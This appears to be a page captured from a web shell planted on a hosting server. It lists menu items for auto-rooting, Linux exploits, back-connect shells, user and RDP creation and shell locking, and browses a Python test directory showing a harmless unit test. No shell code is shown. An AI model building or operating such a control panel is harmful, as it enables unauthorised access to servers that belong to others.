Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.217.116
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib /
python3.9 /
site-packages /
tracer /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
__meta__.py
294
B
-rw-r--r--
test_FilenameCleaner.py
942
B
-rw-r--r--
test_alpm.py
1.29
KB
-rw-r--r--
test_applications.py
3.91
KB
-rw-r--r--
test_collections.py
3.16
KB
-rw-r--r--
test_dnf.py
1.29
KB
-rw-r--r--
test_dpkg.py
1.26
KB
-rw-r--r--
test_hooks.py
1.01
KB
-rw-r--r--
test_lang.py
238
B
-rw-r--r--
test_package.py
371
B
-rw-r--r--
test_portage.py
1.28
KB
-rw-r--r--
test_processes.py
2.38
KB
-rw-r--r--
test_query.py
574
B
-rw-r--r--
test_rules.py
2.19
KB
-rw-r--r--
test_tracer.py
3.4
KB
-rw-r--r--
test_views.py
9.81
KB
-rw-r--r--
test_yum.py
1.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_FilenameCleaner.py
from unittest import TestCase from tracer.resources.FilenameCleaner import FilenameCleaner class TestFilenameCleaner(TestCase): def setUp(self): self.cleaner = FilenameCleaner() def test_strip(self): self.assertEqual("/lib/libdl.so", self.cleaner.strip("/lib/libdl-2.19.so")) self.assertEqual("/lib/libncurses.so", self.cleaner.strip("/lib/libncurses.so.5.9")) self.assertEqual("/bin/bash", self.cleaner.strip("/bin/bash")) self.assertEqual("/usr/share/wicd/curses/wicd-curses.py", self.cleaner.strip("/usr/share/wicd/curses/wicd-curses.py")) self.assertEqual("/usr/bin/gvim", self.cleaner.strip("/usr/bin/gvim#new (deleted)")) self.assertEqual("/usr/lib64/kde4/kded_networkmanagement.so", self.cleaner.strip("/usr/lib64/kde4/kded_networkmanagement.so;53c7cd86") ) self.assertEqual("/usr/lib64/firefox/plugin-container", self.cleaner.strip("/usr/lib64/firefox/plugin-container.#prelink#.N3n7Rk (deleted)") )
Close